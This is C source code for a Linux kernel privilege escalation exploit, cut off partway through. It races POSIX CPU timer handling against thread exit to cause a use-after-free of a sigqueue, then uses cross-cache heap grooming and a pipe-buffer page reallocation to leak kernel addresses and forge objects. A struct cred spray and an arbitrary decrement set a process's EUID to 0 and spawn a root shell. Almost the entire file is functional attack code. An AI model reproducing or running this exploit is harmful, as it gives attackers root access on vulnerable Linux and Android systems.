#define _GNU_SOURCE

// NOTE(review): the original #include list was garbled during extraction (all
// header names were stripped; the original had 25 includes). The headers below
// were reconstructed from the APIs actually used in this file — verify against
// the original source.
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/signalfd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

// Run a syscall-style expression and die (with errno) if it returns -1;
// otherwise evaluate to its result. Uses a GNU statement expression.
// `__typeof__` (instead of plain `typeof`) keeps this usable under -std=c11.
#define SYSCHK(x) ({                          \
    __typeof__(x) __res = (x);                \
    if (__res == (__typeof__(x))-1)           \
        err(1, "SYSCHK(" #x ")");             \
    __res;                                    \
})

#define PAGE_SIZE 0x1000uLL

// For winning the races and extending
// the race windows
#define NUM_SAMPLES 100000
#define NUM_TIMERS 18
#define ONE_MS_NS 1000000uLL
#define SYSCALL_LOOP_TIMES_MAX 300
#define EPOLL_COUNT 500
#define SFD_DUP_COUNT 100

// For synchronization between parent and child
#define SUCCESS_CHAR 's'
#define FAIL_CHAR 'f'
#define SUCCESS_STR "s"
#define FAIL_STR "f"

// The following variables are target dependent. Some benchmarking can
// be done from userland beforehand so that these variables aren't
// needed, but just for this exploit, I manually set them to values
// that work for me. You'll have to figure them out yourself.
#define PARENT_SETTIME_DELAY_US 22000
#define PARENT_SETTIME_DELAY_US_DELTA 50
#define CPU_USAGE_THRESHOLD 22000

/* Global variables for exploit setup START */

// Thread synchronization in child process
pthread_barrier_t barrier;

// Timers used to stall `handle_posix_cpu_timers()` to extend the race window
timer_t stall_timers[NUM_TIMERS];

// Thread that will trigger the timer handling, and also the thread that will
// be reaped by the exploit parent process
pthread_t race_thread;

// Pipes for parent <-> child synchronization
int exploit_child_to_parent[2];
int exploit_parent_to_child[2];

int sigusr1_sfds[SFD_DUP_COUNT]; // signalfd for increasing race window
int sigusr2_sfds[SFD_DUP_COUNT]; // signalfd for detecting the UAF later.
// Amount of LESS times to loop the `getpid()` syscall to waste CPU time
int syscall_loop_times = 0;
int race_retry_count = 0;

// For debugging purposes
pid_t exploit_child_pid, exploit_parent_pid;

// BIG NOTE: The very first timer created by a process actually gets timer ID 0,
// so checking for NULL here is not good enough to figure out whether a timer was
// allocated or not.
//
// Instead, set these to -1, and check for -1 later.
timer_t uaf_timer = (void *) -1, realloc_timer = (void *) -1; // The UAF timer handlers

/* Global variables for exploit setup END */

/* Global variables for cross-cache START */

// `sigqueue_cachep` related constants.
#define SIGQUEUE_objs_per_slab 51
#define SIGQUEUE_cpu_partial 30
#define SIGQUEUE_slab_count 33
#define SIGQUEUE_obj_size 80

// `struct sigqueue` related constants.
#define SIGQUEUE_PREALLOC 1
#define SIGQUEUE_list_next_offset 0
#define SIGQUEUE_list_prev_offset 8
#define SIGQUEUE_info_si_signo_offset (24+0)
#define SIGQUEUE_flags_offset 16
#define SIGQUEUE_user_offset 72

// `cred_jar` and `struct cred` related constants.
#define CRED_JAR_slab_size 192
#define CRED_JAR_euid_offset 20
#define CRED_JAR_egid_offset 24

// This list holds the timers used for cross-caching (both times).
timer_t cross_cache_timers[SIGQUEUE_slab_count][SIGQUEUE_objs_per_slab];

/* Global variables for cross-cache END */

/* Global variables for second stage START */

#define NUM_CRED_PROCS 1000 // Number of processes to spray `struct cred` objects with

int parent_owns_uaf_sigqueue = 0; // Does the parent or child have the UAF sigqueue?
pid_t buggy_pid = 0;              // Parent / child process PID based on above

/* Global variables for second stage END */

// Pin the calling thread to CPU `i`.
//
// The exploit depends on precise CPU placement; a silent mis-pin makes races
// fail in confusing ways, so (fix) a failure is now reported instead of being
// ignored. Still best-effort: we warn rather than abort.
void pin_on_cpu(int i) {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(i, &mask);
    if (sched_setaffinity(0, sizeof(mask), &mask) != 0)
        perror("pin_on_cpu: sched_setaffinity");
}

// Convert a timespec to nanoseconds.
static inline long long ts_to_ns(const struct timespec *ts) {
    return (long long)ts->tv_sec * 1000000000LL + (long long)ts->tv_nsec;
}

// Helper function to fully drain a signalfd.
// Fully drain a signalfd (must be O_NONBLOCK), returning how many
// signalfd_siginfo records were consumed.
//
// FIX(review): the original looped forever if `read()` failed with any errno
// other than EAGAIN/EINTR (e.g. EBADF) or returned 0 (EOF); those cases now
// terminate the loop instead of spinning.
int drain_signalfd(int sfd) {
    int sig_count = 0;
    for (;;) {
        struct signalfd_siginfo si;
        ssize_t n = read(sfd, &si, sizeof(si));
        if (n > 0) { sig_count++; continue; }     // drained some; keep going
        if (n == -1 && errno == EAGAIN) break;    // fully drained
        if (n == -1 && errno == EINTR) continue;  // interrupted; retry
        break; // EOF or unexpected error: stop instead of looping forever
    }
    return sig_count;
}

// Serialized TSC read for the *start* of a measured region.
// `__asm__` (not `asm`) so this also builds under -std=c11.
static inline size_t rdtsc_begin(void) {
#if defined(ARM64)
    return rdtsc();
#else
    size_t a, d;
    __asm__ volatile ("mfence");
    __asm__ volatile ("rdtsc" : "=a" (a), "=d" (d));
    a = (d << 32) | a;
    __asm__ volatile ("lfence");
    return a;
#endif
}

// Serialized TSC read for the *end* of a measured region.
static inline size_t rdtsc_end(void) {
#if defined(ARM64)
    return rdtsc();
#else
    size_t a, d;
    __asm__ volatile ("lfence");
    __asm__ volatile ("rdtsc" : "=a" (a), "=d" (d));
    a = (d << 32) | a;
    __asm__ volatile ("mfence");
    return a;
#endif
}

// This function measures the average CPU time consumption of the `getpid()` syscall.
// (The unit is actually TSC cycles, not nanoseconds, despite the variable name.)
//
// Can overflow if `NUM_SAMPLES` is too high, but with simple syscalls,
// this works just fine.
//
// Can also actually return 0 if some weird scheduler behavior occurs and causes
// the `total_nsec` to overflow, so ensure to check for that when calling it.
//
// Also, very important to be pinned to one CPU before running this!
//
// FIX(review): malloc result is now checked, and a dead duplicate division into
// an unused local was removed.
long int getpid_cpu_usage() {
    size_t (*times)[2] = malloc(NUM_SAMPLES * sizeof(size_t[2]));
    if (!times)
        err(1, "getpid_cpu_usage: malloc");
    for (int i = 0; i < NUM_SAMPLES; i++) {
        times[i][0] = rdtsc_begin();
        syscall(__NR_getpid);
        times[i][1] = rdtsc_end();
    }
    size_t total_nsec = 0;
    for (int i = 0; i < NUM_SAMPLES; i++) {
        total_nsec += times[i][1] - times[i][0];
    }
    free(times);
    return total_nsec / NUM_SAMPLES;
}

// Helper function to read from the reallocated pipe buffer data page.
//
// Reads `size` bytes at offset `offset` out of the pipe and return it in `buf`.
//
// NOTES:
// - `buf` is assumed to be at least PAGE_SIZE bytes large.
// - The pipe is assumed to be readable (i.e write_pipe() was // already called before this). void read_pipe(int pfds[2], size_t size, size_t offset, char *buf) { size_t ret = 0; if (size > PAGE_SIZE) { printf("read_pipe: size too big\n"); SYSCHK(-1); } // Read up to offset first, then read size bytes ret = SYSCHK(read(pfds[0], buf, offset)); if (ret != offset) { printf("read_pipe: offset read failed, offset %ld read %ld\n", offset, ret); SYSCHK(-1); } SYSCHK(read(pfds[0], buf, size)); } // Helper function to read from the reallocated pipe buffer data page. // // Writes `size` bytes out of `buf` into the pipe at offset `offset`. // // NOTES: // - `buf` is assumed to be at least PAGE_SIZE bytes large. // - This will clobber all data before offset. // TODO: void write_pipe(int pfds[2], size_t size, size_t offset, void *buf) { size_t ret = 0; if (size > PAGE_SIZE) { printf("write_pipe: size too big\n"); SYSCHK(-1); } // Write up to offset first, then write the data char zero_buf[offset]; memset(zero_buf, 0, offset); ret = SYSCHK(write(pfds[1], zero_buf, offset)); if (ret != offset) { printf("write_pipe: offset write failed, offset %ld wrote %ld\n", offset, ret); SYSCHK(-1); } ret = SYSCHK(write(pfds[1], buf, size)); if (ret != size) { printf("write_pipe: size write failed, size %ld wrote %ld\n", size, ret); SYSCHK(-1); } } // This function pre-allocates sigqueues very carefully for cross-caching (both times). // // NOTE: Ensure you are on the correct CPU before calling this function! void sigqueue_crosscache_preallocs() { // --------------------------------------------------------------------------------- // // NOTE: On a real android device, a bunch of sigqueues should be allocated first // so that all slab pages from per cpu partial lists, per node partial lists, etc // are used up. This can be done by just spamming real-time signals to some process // that's blocking them. 
// // I won't be doing that here, just going to assume this is being ran in QEMU on a // clean setup where the sigqueue cache's slab pages will not be on any per-cpu // or per-node partial lists. // // --------------------------------------------------------------------------------- // // Goal: get our UAF timer in the middle of slab 3. struct sigevent cross_cache_evt = {0}; cross_cache_evt.sigev_notify = SIGEV_NONE; // Allocate full slabs 1 and 2. for (int i = 0; i < 2; i++) { for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) { SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[i][j])); } } // Allocate 25 objects in slab 3 for (int i = 0; i < 25; i++) { SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][i])); } // Next allocation will be the sigqueue whose slab will be cross-cached. } // This function post-allocates sigqueues very carefully for cross-caching (both times). // // NOTE: Ensure you are on the correct CPU before calling this function! void sigqueue_crosscache_postallocs() { struct sigevent cross_cache_evt = {0}; cross_cache_evt.sigev_notify = SIGEV_NONE; // We have a freed sigqueue at the head of the freelist of slab 3 right now. Re-allocate // it plus the remaining 25 objects in that slab now. // // You can use this special value with a kernel patch to figure out where it's allocated. // This should reallocate on top of whatever sigqueue we are attempting to cross-cache. If // it doesn't, there's a bug in this exploit! // cross_cache_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][25])); cross_cache_evt.sigev_value.sival_ptr = (void *)0; // reset if it was set // Allocate the remaining 25 objects in slab 3. 
// (continuation of sigqueue_crosscache_postallocs: fill the rest of slab 3)
    for (int i = 26; i < SIGQUEUE_objs_per_slab; i++) {
        SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt,
                            &cross_cache_timers[2][i]));
    }

    // Allocate sigqueues for the remaining slabs.
    for (int i = 3; i < SIGQUEUE_slab_count; i++) {
        for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
            SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt,
                                &cross_cache_timers[i][j]));
        }
    }
}

// This function frees the slab 3 page back to the page allocator by very
// carefully freeing sigqueues in the `cross_cache_timers` list.
void free_crosscache_sigqueues() {
    // Now, the target sigqueue should be in the middle of slab 3.
    //
    // Strategically free sigqueues to fill up the per-cpu partial list, but also
    // ensure that the target sigqueue's slab is fully freed before freeing the 32nd slab.
    //
    // Start by freeing the first and last object in slab 1.
    SYSCHK(timer_delete(cross_cache_timers[0][0]));
    SYSCHK(timer_delete(cross_cache_timers[0][SIGQUEUE_objs_per_slab-1]));

    // Now, free the first, and then objects 26 through 51 in slab 2.
    SYSCHK(timer_delete(cross_cache_timers[1][0]));
    for (int i = 25; i < SIGQUEUE_objs_per_slab; i++) {
        SYSCHK(timer_delete(cross_cache_timers[1][i]));
    }

    // Free all objects in slab 3
    for (int i = 0; i < SIGQUEUE_objs_per_slab; i++) {
        SYSCHK(timer_delete(cross_cache_timers[2][i]));
    }

    // Free objects 1 through 25 in slab 4
    for (int i = 0; i < 25; i++) {
        SYSCHK(timer_delete(cross_cache_timers[3][i]));
    }

    // For the remaining slabs up to `cpu_partial` (inclusive), free the first and last obj
    for (int i = 4; i < SIGQUEUE_cpu_partial+1; i++) {
        SYSCHK(timer_delete(cross_cache_timers[i][0]));
        SYSCHK(timer_delete(cross_cache_timers[i][SIGQUEUE_objs_per_slab-1]));
    }

    // Now, freeing one object from the `cpu_partial+1`th slab should trigger
    // `unfreeze_partials()`, which will move fully freed slabs (i.e slab 3) to
    // the page allocator.
    //
    // Free first and last sigqueue here just in case the first one is in the
    // slab overlapped with the previous index.
// (continuation of free_crosscache_sigqueues)
    SYSCHK(timer_delete(cross_cache_timers[SIGQUEUE_cpu_partial+1][0]));
    SYSCHK(timer_delete(cross_cache_timers[SIGQUEUE_cpu_partial+1][SIGQUEUE_objs_per_slab-1]));
}

// Best-effort teardown of all cross-cache timers so the spray can be repeated.
void cleanup_crosscache_sigqueues() {
    // In this case, we can just timer_delete() every single timer without
    // checking for errors. If they exist, they will be deleted. Otherwise,
    // we'll see an error (which is deliberately ignored here).
    for (int i = 0; i < SIGQUEUE_slab_count; i++) {
        for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
            timer_delete(cross_cache_timers[i][j]);
        }
    }
}

// This is the function responsible for triggering `handle_posix_cpu_timers()`.
// Runs as the child's RACER thread; it burns a tuned amount of CPU time and
// then exits so the timer expiry races with thread reaping.
void race_func(void) {
    // Pin to same CPU as the `free_func()` thread. This is the first cross-cache
    // CPU.
    pin_on_cpu(3);

    // For the race condition trigger
    struct sigevent race_evt = {0};
    race_evt.sigev_notify = SIGEV_SIGNAL;
    race_evt.sigev_signo = SIGUSR1;

    // For the UAF timer
    struct sigevent uaf_evt = {0};
    uaf_evt.sigev_notify = SIGEV_SIGNAL;
    uaf_evt.sigev_signo = SIGUSR1; // SIGUSR1 for now
    // uaf_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; // Detect this UAF timer

    prctl(PR_SET_NAME, "RACER");
    // prctl(PR_SET_NAME, "REAPEE"); // KERNEL PATCH: 500ms delay with this

    // Send this thread's TID to the parent process, so the parent can attach to us.
    pid_t tid = (pid_t)syscall(SYS_gettid);
    SYSCHK(write(exploit_child_to_parent[1], &tid, sizeof(pid_t))); // sync 1

    // Get the average CPU time usage of the `getpid()` syscall, so we
    // can use it for the trigger later
    long int getpid_avg = 0;

    // `getpid_cpu_usage()` can technically return 0, it's very rare but
    // if it does, just recalculate.
    while (getpid_avg == 0) {
        getpid_avg = getpid_cpu_usage();
    }

    // Wait for parent to attach and continue us.
    pthread_barrier_wait(&barrier); // barrier 1

    // Create the UAF timer on the first cross-cache CPU.
    //
    // NOTE: This must be the last timer created on this CPU's active slab! Because we will
    // free it and re-allocate over it in `free_func()`.
// (continuation of race_func: create UAF + stall timers, then burn CPU time)
    SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &uaf_evt, &uaf_timer));

    // Switch the pinned CPU after creating the UAF timer. This is important because
    // `free_func()` must be able to run concurrently to this, and we also don't want to
    // touch the active CPU slab of the cross-cache CPU!
    pin_on_cpu(2);

    // Create the remaining stall timers for extending the race window
    for (int i = 0; i < NUM_TIMERS; i++) {
        SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &race_evt, &stall_timers[i]));
    }

    // Wait for the main thread to arm the timers. This is to make sure
    // this thread does not use CPU time to arm the timers.
    pthread_barrier_wait(&barrier); // barrier 2 - wake up main thread
    pthread_barrier_wait(&barrier); // barrier 3 - wait for armed timers

    // Waste just the right amount of CPU time now without firing any of the timers.
    //
    // The logic here is that calling `getpid()` enough times to consume 1 ms of CPU time,
    // and then adding a threshold amount of times on top of that will ensure that the timers
    // fire BEFORE `do_exit()` is called.
    //
    // Then, subtract `syscall_loop_times` (which changes on each retry) to slowly reduce the
    // amount of CPU time being consumed, until the timers fire right after `exit_notify()` wakes
    // up the parent exploit process.
    //
    // Use a print statement in `free_func()` when it receives SIGUSR1 to figure out how often
    // the timers are firing, and adjust CPU_USAGE_THRESHOLD accordingly so that it fires sometimes,
    // but not every time.
    for (int i = 0; i < ((ONE_MS_NS / getpid_avg) + CPU_USAGE_THRESHOLD - syscall_loop_times); i++) {
        syscall(__NR_getpid);
    }

    // This `return` will trigger `do_exit()` in the kernel. The goal is for a scheduler interrupt
    // to occur and `handle_posix_cpu_timers()` to run after `exit_notify()` wakes up the parent
    // exploit process that called `waitpid()` on us.
    return;
}

// Child-side thread that frees the UAF timer the instant the race window opens.
void free_func(void) {
    pin_on_cpu(3);
    prctl(PR_SET_NAME, "FREE_FUNC");

    // Set up a poll for SIGUSR1.
// (continuation of free_func) As soon as we receive SIGUSR1, we know
    // we're in the race window.
    struct pollfd pfd = { .fd = sigusr1_sfds[0], .events = POLLIN };

    // Poll for SIGUSR1.
    for (;;) {
        int ret = poll(&pfd, 1, 0);

        // Got SIGUSR1 from the first stall timer, in race window now.
        if (pfd.revents & POLLIN) {
            // Free the UAF timer now on CPU 3 (first cross-cache CPU).
            SYSCHK(timer_delete(uaf_timer));

            // Immediately switch pinned CPU to 0 and wake up the parent exploit process.
            //
            // Parent exploit process will already have switched to CPU 3, so it can wake
            // up immediately and re-allocate the UAF timer.
            //
            // Important to reallocate in the parent process, so that the sighand locks are
            // different.
            pin_on_cpu(0);
            SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // sync 4.SUCCESS

            // Use the barrier to let the child process continue now and handle
            // the SIGUSR1 signals.
            pthread_barrier_wait(&barrier); // barrier 4
            break;
        }

        // Spurious wake-up check
        if (ret < 0 && errno == EINTR) continue;

        // Some unknown error occurred, pause to debug
        if (ret < 0) {
            perror("free_func poll");
            getchar();
            break;
        }
    }
}

// Stage 2 starts after:
//
// 1. The UAF sigqueue is freed.
// 2. We still have a handle to in either the parent or child's pending list.
// 3. The UAF sigqueue's pointers should point back to itself, making it
//    non-dequeueable by default.
void second_stage_exploit() {
    struct signalfd_siginfo si;
    char m;

    // Create signalfds for all three signals we need to dequeue later.
// (second_stage_exploit: signalfd setup and first cross-cache realloc)
    sigset_t mask;
    sigemptyset(&mask);
    sigaddset(&mask, SIGUSR2); // signal used by UAF sigqueue
    int sigusr2_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));

    sigemptyset(&mask);
    sigaddset(&mask, SIGRTMIN+1); // signal used by other sigqueue
    int sigrt1_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));

    sigemptyset(&mask);
    sigaddset(&mask, SIGRTMIN+2); // signal used for leaking task pending list addr
    int sigrt2_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));

    // Prepare the buffer used by the reallocated pipe buffer data page.
    char buf[PAGE_SIZE];
    memset(buf, 0, PAGE_SIZE);

    // Just double confirm we are pinned to the right cross-cache CPU.
    pin_on_cpu(3);

    printf("\n[+] Stage 2 - Cross-cache the UAF sigqueue's slab\n");

    // Allocate the rest of the sigqueues for cross-cache
    sigqueue_crosscache_postallocs();

    // Allocate a pipe for the pipe buffer data page later, and make it
    // non-blocking for error checking too.
    int realloc_pipefds[2];
    SYSCHK(pipe(realloc_pipefds));

    // Read end non-blocking
    int flags = fcntl(realloc_pipefds[0], F_GETFL, 0);
    SYSCHK(fcntl(realloc_pipefds[0], F_SETFL, flags | O_NONBLOCK));

    // Write end non-blocking
    flags = fcntl(realloc_pipefds[1], F_GETFL, 0);
    SYSCHK(fcntl(realloc_pipefds[1], F_SETFL, flags | O_NONBLOCK));

    // Now free the UAF sigqueue's page back to the page allocator.
    free_crosscache_sigqueues();

    // Realloc UAF sigqueue as a pipe buffer page immediately after it's freed.
    // This is done by writing to the pipe.
    SYSCHK(write(realloc_pipefds[1], buf, PAGE_SIZE));

    printf("\t[+] Reallocated UAF sigqueue slab as a pipe buffer data page\n");
    printf("\t[+] Cleaning up all cross-cache allocations to prepare for next cross-cache\n");

    // We will be cross-caching again very soon, so free all other cross-cache sigqueues.
    // NOTE: do this on the same CPU as the first cross-cache.
// (second_stage_exploit: prepare second cross-cache and seed the pending list)
    cleanup_crosscache_sigqueues();

    printf("\t[+] Preparing task pending list for heap leaks\n");

    // Switch CPUs to start on a clean slate for the second cross-cache.
    pin_on_cpu(2);

    // Do the preallocs same as before.
    sigqueue_crosscache_preallocs();

    // Send a new signal to the process to fill in the UAF sigqueue's next pointer
    // Use `tkill()` as that uses the task's pending list. `kill()` uses the
    // shared pending list instead.
    //
    // This sigqueue is allocated after the preallocs.
    SYSCHK(syscall(__NR_tkill, buggy_pid, SIGRTMIN+1));

    // Before dequeueing the SIGRTMIN+2 signal, switch back to a non-cross-cache CPU.
    //
    // This is because this signal was prepared on a non-cross-cache CPU in the first
    // place, and we aren't using it in the cross-cache, so in order to not mess with
    // the cross-cache, we have to free it on a different CPU.
    pin_on_cpu(1);

    // NOTE: If the `buggy_pid` points to the child process, we have to ask the
    // child process to dequeue the signal for us.
    if (parent_owns_uaf_sigqueue) {
        // Dequeueing this signal will put the pointer of our task struct's pending list
        // into the ->prev pointer of the UAF sigqueue.
        SYSCHK(read(sigrt2_sfd, &si, sizeof(si)));
    } else {
        // Child will dequeue the signal for us. Wait for it to finish.
        SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 2
        SYSCHK(read(exploit_child_to_parent[0], &m, 1));           // stage 2 - sync 3
    }

    // Now switch back to the second cross-cache CPU
    pin_on_cpu(2);

    // Scan the pipe buffer data page for the `next` and `prev` pointer to store them.
    // Everything will be zeroes except those pointers at this point in time.
    read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf);

    size_t other_sigqueue_addr = 0;
    size_t task_pending_list_addr = 0;
    size_t uaf_sigqueue_offset = 0;

    // Increment by `SIGQUEUE_obj_size` and look at the `next` pointer offset.
// (second_stage_exploit: scan the leaked page, then forge the UAF sigqueue)
    for (int i = 0; i < PAGE_SIZE; i += SIGQUEUE_obj_size) {
        other_sigqueue_addr = *((size_t *)(buf + (i + SIGQUEUE_list_next_offset)));
        if (other_sigqueue_addr) {
            uaf_sigqueue_offset = i;
            task_pending_list_addr = *((size_t *)(buf + (i + SIGQUEUE_list_prev_offset)));
            printf("\t[+] Heap leaks:\n");
            printf("\t\t- UAF sigqueue page offset 0x%lx\n", uaf_sigqueue_offset);
            printf("\t\t- Other sigqueue 0x%lx\n", other_sigqueue_addr);
            printf("\t\t- Task pending list addr 0x%lx\n", task_pending_list_addr);
            break;
        }
    }

    // Set up the UAF sigqueue so we can leak it's own address now.
    // Key points are:
    //
    // 1. Setting `next` and `prev` both to the other sigqueue's address ensures
    //    that the UAF sigqueue's pointer stays in the task pending list.
    // 2. `info.si_signo` must be set to SIGUSR2, otherwise the signal will not
    //    be dequeued.
    // 3. `SIGQUEUE_PREALLOC` does not technically need to be set, but I just do it anyway.
    memset(buf, 0, PAGE_SIZE);
    *((size_t *)(buf + SIGQUEUE_list_next_offset)) = other_sigqueue_addr; // list->next
    *((size_t *)(buf + SIGQUEUE_list_prev_offset)) = other_sigqueue_addr; // list->prev
    *((int *)(buf + SIGQUEUE_flags_offset)) = SIGQUEUE_PREALLOC;          // flags
    *((int *)(buf + SIGQUEUE_info_si_signo_offset)) = SIGUSR2;            // info->si_signo (comment fixed; was mislabeled si_code)
    write_pipe(realloc_pipefds, SIGQUEUE_info_si_signo_offset + sizeof(int), uaf_sigqueue_offset, buf);

    // Now drain the UAF sigqueue's signal to write it's own pointers back into itself.
    // This will happen because of the `list_del_init()` in `collect_signal()`.
    //
    // NOTE: This overwrites the other sigqueue's `next` and `prev` pointers to point
    //       back to the other sigqueue's address. However, the task pending list's
    //       `prev` pointer still points to other sigqueue's address. Basically,
    //       when we free the other sigqueue soon, the task pending list's `prev`
    //       pointer won't be updated.
    //
    // All this means is that we can't append anymore signals to this task's pending
    // list after this point.
// // NOTE: After this, SIGUSR2 is removed from the task's signal mask, but // SIGRTMIN+1 stays. // // NOTE: If the `buggy_pid` points to the child process, we have to ask the // child process to dequeue the signal for us. if (parent_owns_uaf_sigqueue) { SYSCHK(read(sigusr2_sfd, &si, sizeof(si))); } else { SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 4 SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 5 } // Read the UAF sigqueue's own address now through the pipe buffer size_t uaf_sigqueue_addr = 0; read_pipe(realloc_pipefds, 8, uaf_sigqueue_offset, buf); uaf_sigqueue_addr = *((size_t *)(buf + SIGQUEUE_list_next_offset)); printf("\t\t- UAF sigqueue address 0x%lx\n", uaf_sigqueue_addr); // Now free the other sigqueue back to the freelist of it's slab page. // // Since our UAF sigqueue is at the head of the pending list, set it's next pointer // to point to the other sigqueue so the list can be traversed to it. read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf); // reset pipe *((size_t *)(buf + SIGQUEUE_list_next_offset)) = other_sigqueue_addr; // list->next write_pipe(realloc_pipefds, SIGQUEUE_list_next_offset + sizeof(size_t), uaf_sigqueue_offset, buf); // Finally, dequeue the other signal's sigqueue and free it. It's SIGRTMIN+1. // // NOTE: If the `buggy_pid` points to the child process, we have to ask the // child process to dequeue the signal for us. if (parent_owns_uaf_sigqueue) { SYSCHK(read(sigrt1_sfd, &si, sizeof(si))); } else { SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 6 SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 7 } printf("\n[+] Stage 3 - Cross-cache the other sigqueue's slab\n"); // Now, second cross-cache post allocs. The target sigqueue is the // other sigqueue, which was just freed. sigqueue_crosscache_postallocs(); // Before freeing the other sigqueue's slab page back to the page allocator, // fork NUM_CRED_PROCS processes. 
// (second_stage_exploit) Do this on a non-cross-cache CPU.
    //
    // This is preparing for the `struct cred` spray later.
    pin_on_cpu(1);

    printf("\t[+] Preparing %d processes for future `struct cred` spray\n", NUM_CRED_PROCS);

    int cred_parent_pfds[2];
    int cred_child_pfds[2];
    SYSCHK(pipe(cred_parent_pfds));
    SYSCHK(pipe(cred_child_pfds));

    for (int i = 0; i < NUM_CRED_PROCS; i++) {
        pid_t pid = SYSCHK(fork());
        if (!pid) { // child process
            SYSCHK(close(cred_parent_pfds[1]));
            SYSCHK(close(cred_child_pfds[0]));

            // Wait for the parent to wake us up to call `setresuid(-1,-1,-1)`
            SYSCHK(read(cred_parent_pfds[0], &m, 1));

            // Pin on same CPU as the cross-cache CPU before calling
            // `setresuid(-1,-1,-1)`. This allocates one cred struct.
            pin_on_cpu(2);
            SYSCHK(setresuid(-1,-1,-1));

            // Reset CPU and let the parent know we finished.
            pin_on_cpu(1);
            SYSCHK(write(cred_child_pfds[1], &m, 1));

            // Wait for the parent to potentially decrement our EUID to 0.
            SYSCHK(read(cred_parent_pfds[0], &m, 1));

            // Check our EUID
            uid_t euid = geteuid();

            // If we have root privs now, just spawn a shell
            if (euid == 0) {
                printf("\t[+] Found child process with euid=%d!\n", euid);
                printf("\t[+] Spawning root shell...\n");
                printf("\n");
                printf("\n");
                printf("\n");

                // Must set our UID and GID to 0 as well. "/bin/sh" seems to do a
                // `setuid(getuid())`, and since the we only changed our EUID,
                // that resets our privs here.
                setresuid(0, 0, 0);
                setresgid(0, 0, 0);
                system("/bin/sh");
            } else {
                // Parent won't wake us up anymore, wake up the parent and
                // block forever
                SYSCHK(write(cred_child_pfds[1], &m, 1));
                SYSCHK(read(cred_parent_pfds[0], &m, 1));
            }
        }
    }

    // Continuing in the parent process now.
    SYSCHK(close(cred_parent_pfds[0]));
    SYSCHK(close(cred_child_pfds[1]));

    // For later, pick the second cred object in the other sigqueue's slab arbitrarily.
// (second_stage_exploit: respray slab as creds, forge the arbitrary-decrement sigqueue)
    size_t target_cred_addr = (other_sigqueue_addr & ~0xfff) + CRED_JAR_slab_size;
    printf("\t[+] Target cred object to modify will be at 0x%lx\n", target_cred_addr);

    // Now free the other sigqueue's slab page, make sure to switch CPUs back to the
    // second cross-cache CPU!
    pin_on_cpu(2);
    free_crosscache_sigqueues();

    // Wake up each child process to call `setresuid(-1,-1,-1)`
    //
    // NOTE: Writing to the pipe will allocate new pages. Switch
    //       to a non-cross-cache CPU to do this.
    pin_on_cpu(1);
    for (int i = 0; i < NUM_CRED_PROCS; i++) {
        SYSCHK(write(cred_parent_pfds[1], &m, 1));
        SYSCHK(read(cred_child_pfds[0], &m, 1));
    }

    printf("\t[+] Reallocated other sigqueue's slab as a `struct cred` page\n");
    printf("\n[+] Stage 4 - Decrement EUID of target cred to 0\n");

    // At this point, SIGUSR2 will have been removed from the task's pending signal mask,
    // but SIGRTMIN+1 will still be on it. Set up the UAF sigqueue to use SIGRTMIN+1.
    //
    // Setting up the `user` pointer to `target_address - 8` gives us an arbitrary
    // decrement primitive. Point this to the target cred's EUID offset - 8.
    read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf); // reset pipe
    memset(buf, 0, PAGE_SIZE);
    *((size_t *)(buf + SIGQUEUE_list_next_offset)) = uaf_sigqueue_addr; // list->next
    *((size_t *)(buf + SIGQUEUE_list_prev_offset)) = uaf_sigqueue_addr; // list->prev
    *((int *)(buf + SIGQUEUE_info_si_signo_offset)) = SIGRTMIN+1;       // info->si_signo (comment fixed; was mislabeled si_code)
    *((size_t *)(buf + SIGQUEUE_user_offset)) = target_cred_addr + CRED_JAR_euid_offset - 8uLL; // user
    write_pipe(realloc_pipefds, SIGQUEUE_user_offset + sizeof(size_t), uaf_sigqueue_offset, buf);

    // Arbitrary decrement time! Decrement target cred's EUID to 0. This process
    // will have the same UID as the target cred, so we can use that to know
    // how many times to decrement.
    //
    // NOTE: If the `buggy_pid` points to the child process, we have to ask the
    //       child process to dequeue the signal for us.
